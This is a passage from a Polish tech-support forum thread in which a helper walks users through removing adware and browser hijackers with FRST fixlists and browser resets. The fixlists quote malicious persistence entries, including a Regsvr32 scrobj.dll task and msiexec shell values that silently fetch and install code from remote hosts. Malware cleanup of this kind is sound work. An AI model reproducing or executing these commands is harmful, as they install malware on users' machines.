Miszel03

Wygląda, że się wykonano. Poproszę o dalsze raporty.

Księgowej współczuje, bo wykonywanie tego zawodu bez komputera to faktycznie udręka. Przepraszam, nie mogłem szybciej. Nie powiem, że taki stan systemu to ja widzę niecodziennie, bo widzę nawet i kilka razy dziennie co prezentuje obraz sytuacji. Masa infekcji, prefabrykowane przeglądarki, adware zarażające skróty i wiele wiele więcej. Myślę, że uporamy się z tym szybko. Do poczytania, obowiązkowo: KLIK. To uchroni Cię przed kolejną wizytą w tym dziale 1. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-4102225431-1871780152-3223173906-1000\...\ChromeHTML: -> C:\Program Files (x86)\Bagsarah\Application\chrome.exe (Google Inc.) CustomCLSID: HKU\S-1-5-21-4102225431-1871780152-3223173906-1000_Classes\CLSID\{1423F872-3F7F-4E57-B621-8B1A9D49B448}\InprocServer32 -> C:\Users\Kasia\AppData\Local\Google\Update\1.3.27.5\psuser_64.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-4102225431-1871780152-3223173906-1000_Classes\CLSID\{59B55F04-DE14-4BB8-92FF-C4A22EF2E5F4}\InprocServer32 -> C:\Users\Kasia\AppData\Local\Google\Update\1.3.31.5\psuser_64.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-4102225431-1871780152-3223173906-1000_Classes\CLSID\{5C8C2A98-6133-4EBA-BBCC-34D9EA01FC2E}\InprocServer32 -> C:\Users\Kasia\AppData\Local\Google\Update\1.3.28.1\psuser_64.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-4102225431-1871780152-3223173906-1000_Classes\CLSID\{78550997-5DEF-4A8A-BAF9-D5774E87AC98}\InprocServer32 -> C:\Users\Kasia\AppData\Local\Google\Update\1.3.28.13\psuser_64.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-4102225431-1871780152-3223173906-1000_Classes\CLSID\{793EE463-1304-471C-ADF1-68C2FFB01247}\InprocServer32 -> C:\Users\Kasia\AppData\Local\Google\Update\1.3.29.5\psuser_64.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-4102225431-1871780152-3223173906-1000_Classes\CLSID\{8C46158B-D978-483C-A312-16EE5013BE04}\InprocServer32 -> C:\Users\Kasia\AppData\Local\Google\Update\1.3.33.3\psuser_64.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-4102225431-1871780152-3223173906-1000_Classes\CLSID\{CB492AF1-2CEF-4E58-BE47-471C77D0C8BA}\InprocServer32 -> C:\Users\Kasia\AppData\Local\Google\Update\1.3.32.7\psuser_64.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-4102225431-1871780152-3223173906-1000_Classes\CLSID\{CC182BE1-84CE-4A57-B85C-FD4BBDF78CB2}\InprocServer32 -> C:\Users\Kasia\AppData\Local\Google\Update\1.3.29.1\psuser_64.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-4102225431-1871780152-3223173906-1000_Classes\CLSID\{D1EDC4F5-7F4D-4B12-906A-614ECF66DDAF}\InprocServer32 -> C:\Users\Kasia\AppData\Local\Google\Update\1.3.28.15\psuser_64.dll => Brak pliku Task: {0659A980-3244-4202-929B-52EA5684F95D} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lotusiloveyou.com/?data=zDlkMj8yNjRWMYYxMdVXMWk4MjYcRkVXFdhXRWMyN8F2OWQYRF== scrobj.dll Task: {EF0F48A4-5D77-4EF5-9E10-B0316862B2DE} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-05-09] () Task: {F435B3AD-8F34-47FC-8D19-7D1DC252A958} - System32\Tasks\{1F2A387E-0C8B-4A90-B544-ECB3A1B99015} => pcalua.exe -a C:\Users\Kasia\AppData\Local\Temp\jre-8u131-windows-au.exe -d C:\Windows\SysWOW64 -c /installmethod=jau FAMILYUPGRADE=1 RemoveDirectory: C:\Program Files (x86)\MIO WMI_ActiveScriptEventConsumer_DellCommandPowerManagerAlertEventConsumer: WMI_ActiveScriptEventConsumer_DellCommandPowerManagerPolicyChangeEventConsumer: FirewallRules: [{43588AFA-371E-4EB2-809A-A7D0D9562A88}] => (Allow) C:\Program Files (x86)\Bagsarah\Application\chrome.exe FirewallRules: [{1750B21B-9C19-4DF6-B240-40EEDD753E7C}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe FirewallRules: [{6654B80F-3A65-4B3C-BEF2-F6D9096F8763}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe RemoveDirectory: C:\Program Files (x86)\Bagsarah RemoveDirectory: C:\Users\Kasia\AppData\Local\Bagsarah RemoveDirectory: C:\Users\Kasia\AppData\Roaming\Bagsarah RemoveDirectory: C:\Program Files (x86)\Firefox RemoveDirectory: C:\Users\Kasia\AppData\Local\Firefox RemoveDirectory: C:\Users\Kasia\AppData\Roaming\Firefox ShortcutWithArgument: C:\Users\Kasia\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_felcaaldnbdncclmgdcncolpebgiejap\Arkusze Google.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=Default --app-id=felcaaldnbdncclmgdcncolpebgiejap ShortcutWithArgument: C:\Users\Kasia\AppData\Local\Bagsarah\User Data\Default\Web Applications\_crx_felcaaldnbdncclmgdcncolpebgiejap\Arkusze Google.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=Default --app-id=felcaaldnbdncclmgdcncolpebgiejap ShortcutWithArgument: C:\Users\Kasia\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1494320924&z=cb2aba3176602e7e4502859g3zbt9z6cdo8e1tdgam&from=che0812&uid=TS256GSSD370S_C162661064 ShortcutWithArgument: C:\Users\Kasia\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Microsoft WSE 3.0\WSE on the Web.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1494320924&z=cb2aba3176602e7e4502859g3zbt9z6cdo8e1tdgam&from=che0812&uid=TS256GSSD370S_C162661064 ShortcutWithArgument: C:\Users\Kasia\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1494320924&z=cb2aba3176602e7e4502859g3zbt9z6cdo8e1tdgam&from=che0812&uid=TS256GSSD370S_C162661064 ShortcutWithArgument: C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Arkusze Google.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=Default --app-id=felcaaldnbdncclmgdcncolpebgiejap ShortcutWithArgument: C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1494320924&z=cb2aba3176602e7e4502859g3zbt9z6cdo8e1tdgam&from=che0812&uid=TS256GSSD370S_C162661064 ShortcutWithArgument: C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\BigFarm.lnk -> C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (Microsoft Corporation) -> -Command "& {Start-Process -FilePath hxxp://bigfarm.goodgamestudios.com/?w=239064}"; ShortcutWithArgument: C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\big_bang_empire.lnk -> C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (Microsoft Corporation) -> -Command "& {Start-Process -FilePath hxxp://www.bigbangempire.com/?ref=281-000-000-005}"; ShortcutWithArgument: C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\BigFarm.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://bigfarm.goodgamestudios.com/?w=239064 ShortcutWithArgument: C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\big_bang_empire.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www.bigbangempire.com/?ref=281-000-000-005 C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\5d696d521de238c3\Google Chrome.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk Winlogon\Notify\ScCertProp: wlnotify.dll [X] HKU\S-1-5-21-4102225431-1871780152-3223173906-1000\...\Run: [GoogleChromeAutoLaunch_2ADBC5D4CA6B0A1DE744757424E6F2ED] => "C:\Program Files (x86)\Everness\Application\chrome.exe" --no-startup-window /prefetch:5 HKU\S-1-5-21-4102225431-1871780152-3223173906-1000\...\Run: [background_fault] => C:\Users\Kasia\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-09] (AVAST Software) HKU\S-1-5-21-4102225431-1871780152-3223173906-1000\...\Policies\system: [shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj8yNjRWMYYxMdVXMWk4MjYcRkVXFdhXRWMyN8F2OWQYRF== /q RemoveDirectory: C:\Program Files (x86)\Everness RemoveDirectory: C:\Users\Kasia\AppData\Local\Everness RemoveDirectory: C:\Users\Kasia\AppData\Roaming\Everness C:\Users\Kasia\AppData\Local\background_fault\aswRD.exe HKU\S-1-5-21-4102225431-1871780152-3223173906-1000\...\Policies\Explorer: [NoLowDiskSpaceChecks] 1 IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Ograniczenia HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1494320924&z=cb2aba3176602e7e4502859g3zbt9z6cdo8e1tdgam&from=che0812&uid=TS256GSSD370S_C162661064 HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1494320924&z=cb2aba3176602e7e4502859g3zbt9z6cdo8e1tdgam&from=che0812&uid=TS256GSSD370S_C162661064 HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.istartsurf.com/web/?type=ds&ts=1434916331&z=1812db3e52683682890b67bg3z9caz8tag0qecco5q&from=cor&uid=TS256GSSD370S_C162661064&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.istartsurf.com/web/?type=ds&ts=1434916331&z=1812db3e52683682890b67bg3z9caz8tag0qecco5q&from=cor&uid=TS256GSSD370S_C162661064&q={searchTerms} HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1494320924&z=cb2aba3176602e7e4502859g3zbt9z6cdo8e1tdgam&from=che0812&uid=TS256GSSD370S_C162661064 HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1494320924&z=cb2aba3176602e7e4502859g3zbt9z6cdo8e1tdgam&from=che0812&uid=TS256GSSD370S_C162661064 HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.istartsurf.com/web/?type=ds&ts=1434916331&z=1812db3e52683682890b67bg3z9caz8tag0qecco5q&from=cor&uid=TS256GSSD370S_C162661064&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.istartsurf.com/web/?type=ds&ts=1434916331&z=1812db3e52683682890b67bg3z9caz8tag0qecco5q&from=cor&uid=TS256GSSD370S_C162661064&q={searchTerms} HKU\S-1-5-21-4102225431-1871780152-3223173906-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.istartsurf.com/web/?type=dspp&ts=1434916399&z=72c6d913177a99cde3b5acagaz6c6zat8gfq2c4t1z&from=cor&uid=TS256GSSD370S_C162661064&q={searchTerms} SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-21-4102225431-1871780152-3223173906-1000 -> {1ACDEAF4-49DC-4E40-AA61-C4AF9D052B43} URL = StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe hxxp://www.ourluckysites.com/?type=sc&ts=1494320924&z=cb2aba3176602e7e4502859g3zbt9z6cdo8e1tdgam&from=che0812&uid=TS256GSSD370S_C162661064 StartMenuInternet: Google Chrome - C:\Program Files (x86)\Google\Chrome\Application\chrome.exe hxxp://www.ourluckysites.com/?type=sc&ts=1494320924&z=cb2aba3176602e7e4502859g3zbt9z6cdo8e1tdgam&from=che0812&uid=TS256GSSD370S_C162661064 R2 ANSARE; C:\Users\Kasia\AppData\Local\ANSARE\Snare.dll [826368 2017-05-08] (InterSect Alliance Pty Ltd) [brak podpisu cyfrowego] R2 BIT; C:\ProgramData\BIT\BIT.dll [1857536 2017-05-09] (BIT.dll) [brak podpisu cyfrowego] R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [97280 2017-05-11] () [brak podpisu cyfrowego] S2 NPASRE; C:\Users\Kasia\AppData\Local\NPASRE\Snare.dll [830464 2017-05-10] (InterSect Alliance Pty Ltd) [brak podpisu cyfrowego] R2 OneDirveSrv; C:\ProgramData\Microsoft OneDrive\setup\SyncTool.dll [129024 2017-05-10] () [brak podpisu cyfrowego] R2 VNASRE; C:\Users\Kasia\AppData\Local\VNASRE\Snare.dll [826368 2017-05-09] (InterSect Alliance Pty Ltd) [brak podpisu cyfrowego] R2 WinSAPSvc; C:\Users\Kasia\AppData\Roaming\WinSAPSvc\WinSAP.dll [585216 2017-05-09] (serviec) [brak podpisu cyfrowego] U3 pgddapod; \??\C:\Users\Kasia\AppData\Local\Temp\pgddapod.sys [X] C:\Users\Kasia\AppData\Local\ANSARE C:\ProgramData\BIT C:\Users\Kasia\AppData\Local\NPASRE C:\ProgramData\Microsoft OneDrive\setup\SyncTool.dll C:\Users\Kasia\AppData\Local\VNASRE C:\Users\Kasia\AppData\Roaming\WinSAPSvc C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Firefox.lnk C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Mozilla Firefox.lnk C:\Users\Public\Desktop\Mozilla Firefox.lnk C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\firefox — skrót.lnk EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Wyczyść i zabezpiecz przeglądarkę Google Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj wszystkie nieznane i niepotrzebne Ci rozszerzenia. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin Ustaw jakąkolwiek zaufaną przeglądarkę jako domyślną, najlepiej Google Chrome. To wymagany krok to kasacji modyfikacji infekcji. 3. Wyczyść i zabezpiecz przeglądarkę Mozilla FireFox: Odłącz synchronizację (o ile włączona): KLIK. Menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone. Menu Historia > Wyczyść historię przeglądania. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin. 4. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry). bagsarah;everness;firefox Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum. 5. Pobierz AdwCleaner uruchom go i kliknij Skanuj, a gdy uaktywni się przycisk Oczyść kliknij go. Dostarcz raport z tego działania. 6. Zrób nowy log FRST z opcji Skanuj (Scan), wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

Raport TDSSKiller w porządku, niczego nie wykrył. Usługi systemowe również nieuszkodzone. W systemie brak oznak infekcji, mógłbym zlecić drobną kosmetykę, ale uważam, że nie ma takiej potrzeby (to naprawdę drobnica).

To nie system jest zarażony, a urządzenia z pamięcią przenośną (myślę, że BDF nie wyleczył tego właściwie). Raport sugeruję, że zarażone są urządzenia I: i E:. Jeśli chodzi o system to tylko kosmetyka oraz skan przeciwwirusowy. 1. Włącz przywracanie systemu. 2. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: Task: {38D5FB72-0EB6-4192-B8B1-1A03E39ADA31} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Brak pliku Task: {4F1622CA-D4F6-4082-923F-232F396DD275} - \WPD\SqmUpload_S-1-5-21-2655180193-3343946426-3718023734-1001 -> Brak pliku Task: {64B21053-2474-49A5-92B6-21AA04565B87} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Brak pliku Task: {73A9BE5D-3365-4FA3-87A8-CFB250B73A97} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Brak pliku Task: {7BEF7ECA-2EE3-49B8-AF3A-A4B893A6C373} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Brak pliku Task: {AA4F071F-83EE-4FDB-97BB-53D3387137DA} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Brak pliku Task: {AC1EABFB-F64D-45A9-AF8E-E46FB190DD26} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Brak pliku Task: {BBF456DD-D4BC-40EE-AD51-FE06C683CF08} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Brak pliku Task: {D13CCA0C-805F-4512-B2CA-BCBB3BBFC87C} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Brak pliku Task: {D20228C2-BEBA-4E73-B326-C6E76CFD5A90} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Brak pliku Task: {E92F1869-7866-4634-969B-11DA40AD7B9C} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Brak pliku Task: {FBF4CEDB-3A90-4A9D-9CF3-471868328E81} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Brak pliku HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = S3 pccsmcfd; \SystemRoot\system32\DRIVERS\pccsmcfd.sys [X] C:\Users\konra_000\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Hugin\Batch Processor.lnk C:\Users\konra_000\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Hugin\Calibrate Lens GUI.lnk EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Całościowo przeskanuj system za pomocą Malwarebytes AntiMalware. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. 4. Zrób raport z narzędzia USBFix (z opcji Research oraz Listing) z podpiętymi urządzaniem E: i I: Z.aprezentuj go na forum. 5. Zrób nowy log FRST z opcji Skanuj (Scan), wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

Komputronik ma HTTPS. Strony z możliwościowa zakupów online bez HTTPS to czyste samobójstwo względem bezpieczeństwa IT. Przeglądarki nic nie namieszały, - czas najwyższy na poprawienie norm bezpieczeństwa w Sieci. Źle dobierasz słowa "niebezpieczna", a "niezabezpieczona" to dwa różne światy. Ale nie możemy zapominać o tym, że "niezabezpieczona" może spowodować "niebezpieczną" stronę. Albo stoimy w miejscu i narzekamy na phisisng, kradzieże etc., albo zaczynamy wprowadzać coraz to lepsze zabezpieczenia. To tak jak z Windows XP - jest niezabezpieczony, ale czy niebezpieczny? To wszystko zależy od użytkownika. A co "spierania się" to nic takiego nie miało miejsca przynajmniej w moim odczuciu.

Racja, źle dobrałem słowa. Witryny nie prebarykowane pod działania szkodliwe na HTTP są bezpieczne dla Twojego logowanie, aczkolwiek dane nie są szyfrowane. To zależy od serwisu, z którego korzystasz. U nas jesteś bezpieczny - gdzie indziej już nie koniecznie. HTTP jest niebezpieczne wtedy kiedy wpadnie w niepowołane ręce.

Nie rozumiem. Co masz na myśli poprzez "mniej kompleksowy"? Temat od strony moderacyjnej wygląda całkowicie w porządku.

HTTP nie jest bezpieczne i jego wsparcie jest wycofywane. Przeglądarki już się przestawiają (cześć już jest przestawiona np. tj. mówisz Opera) na ten bezpieczniejszy tryb połączenia tym samym ostrzegając przed połączeniem HTTP. Avoiding Google Security Warnings Deprecating Non-Secure HTTP Zdradzę tylko, że Fixitpc jest w trakcie konwersji z HTTP na HTTPS, więc z naszej strony jak zawsze wszystko jest dopięte na ostatni guzik. Cóż...bezpieczeństwo w Sieci jest już na coraz wyższym poziomie. Zmierzamy do dobrego celu.

Dlaczego DNS nie zmienione? To celowe ustawienie jest? Jeśli chodzi o resztę to jest już lepiej. Czas na poprawki i skan antywirusowy. P.S: Jak proszę o skan to tylko o skan, a nie o skan + czyszczenie (patrz pkt. 6) Teraz odpuszczam, ale proszę czytaj moje punkty dokładnie. 1. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: DeleteKey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Footjane DeleteKey: HKEY_USERS\S-1-5-21-1648149943-899210602-299422045-1001\Software\Footjane DeleteKey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Firefox DeleteKey: HKEY_USERS\S-1-5-21-1648149943-899210602-299422045-1001\Software\Firefox 2017-05-16 07:08 - 2017-05-16 07:08 - 00000000 _____ C:\Windows\SysWOW64\3333333 2017-05-16 07:08 - 2017-05-16 07:08 - 00000000 _____ C:\Windows\SysWOW64\1111111 2017-05-16 07:08 - 2017-05-16 07:08 - 00000000 _____ C:\Windows\SysWOW64\1111 2017-05-16 07:08 - 2017-05-16 07:08 - 00000000 _____ C:\Windows\SysWOW64\00 2017-04-21 13:57 - 2017-05-16 07:08 - 00000000 _____ C:\Windows\SysWOW64\22 2017-04-20 16:52 - 2017-04-26 07:13 - 00000000 _____ C:\Windows\SysWOW64\33 2017-04-20 16:51 - 2017-05-16 07:08 - 00000000 _____ C:\Windows\SysWOW64\11 EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Całościowo przeskanuj system za pomocą Malwarebytes AntiMalware (masz zainstalowany, więc robisz tylko aktualizację baz i programu). Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. 3. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut Dołącz też plik fixlog.txt. Podsumuj również obecny stan systemu.

Póki przypomnienie jest taktowne (Twoje jest bardzo) to nie wlepiam ostrzeżeń. Przepraszam za opóźnienia w odpowiadaniu. Dwie fałszywki: pod Google Chrome i pod Mozilla FireFox. Po za tym widać również wpisy startowe na powłoce i w Harmonogramie zadań uruchamiające różne strony. To już 26 takie temat... Przepraszam, że kopiuje opisy ze starych, ale nie jestem w stanie wymyślić innych opisów do takich samych przypadków 26 razy. Za pomoc oczekuję, że przeczytasz lekturę na temat zabezpieczenia się pod takimi sytuacjami: Portale z oprogramowaniem / Instalatory - na co uważać. Zaopatrz się również w porządne oprogramowanie zabezpieczające (jest tyle dobrych, a darmowych...) - KLIK. Treść lektury zweryfikuję w przyszłości sprawdzając czy ktoś z takim adresem IP / nickiem założył kolejny temat z pomocą 1. Przez panel sterowania odinstaluj: Sponsorzy instalacyjni / Zbędniki: McAfee Security Scan Plus. Przestarzałe oprogramowanie: Spybot - Search & Destroy. 2. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: Task: {E573AA43-4DF8-4588-A36C-89034F6DC713} - System32\Tasks\{491760EA-A235-4A6E-B3C7-A826D7D65EBB} => pcalua.exe -a C:\Users\Saszka\AppData\Roaming\omiga-plus\UninstallManager.exe -c -ptid=cor RemoveDirectory: C:\Users\Saszka\AppData\Roaming\omiga-plus C:\Users\Saszka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk C:\Users\Saszka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk C:\Users\Saszka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk C:\Users\Public\Desktop\Google Chrome.lnk RemoveDirectory: C:\Program Files (x86)\Zoohair RemoveDirectory: C:\Users\Saszka\AppData\Local\Zoohair RemoveDirectory: C:\Users\Saszka\AppData\Roaming\Zoohair AlternateDataStreams: C:\ProgramData\TEMP:56E2E879 [135] FirewallRules: [{5807452F-88D6-4E26-81FB-3AF3F8000E8B}] => (Allow) C:\Program Files (x86)\Zoohair\Application\chrome.exe FirewallRules: [{5FC9436D-40AC-4998-B95B-A5AFD1B84D47}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe FirewallRules: [{40D9160E-0161-43BC-BEF1-59B7FD404B9E}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe RemoveDirectory: C:\Program Files (x86)\Firefox RemoveDirectory: C:\Users\Saszka\AppData\Local\Firefox RemoveDirectory: C:\Users\Saszka\AppData\Roaming\Firefox Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X] HKU\S-1-5-21-1870858389-217524516-3277012225-1000\...\Policies\system: [shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj8cRTMxFdFdRjk1MjY3F8ExMTUdNWH2NTF5FkRYMWH2Nc== /q IFEO\DisplaySwitch.exe: [Debugger] IFEO\taskmgr.exe: [Debugger] GroupPolicy: Ograniczenia - Chrome CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia URLSearchHook: HKLM-x32 -> Domyślne = {CCC7B151-1D8C-11E3-B2AD-F3EF3D58318D} SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [107672 2017-05-04] () R2 IISvr; C:\ProgramData\Package Cache\{59399776-575D-9C54-E861-0D5EAB7E707D}v10.1.14393.795\Installers\IIS\iisexp.dll [105472 2017-05-04] () [brak podpisu cyfrowego] S2 AppleNotificationsSrv; C:\ProgramData\Software\Apple\Apps\Notification.dll [X] S2 SNARE; C:\Users\Saszka\AppData\Local\SNARE\Snarer.dll [X] S2 WindowsOfficeSrv; C:\ProgramData\Microsoft\OneDrive\Uploader.dll [X] C:\ProgramData\Software\Apple\Apps\Notification.dll C:\Users\Saszka\AppData\Local\SNARE\Snarer.dll C:\ProgramData\Microsoft\OneDrive\Uploader.dll C:\ProgramData\Package Cache\{59399776-575D-9C54-E861-0D5EAB7E707D}v10.1.14393.795\Installers\IIS\iisexp.dll S2 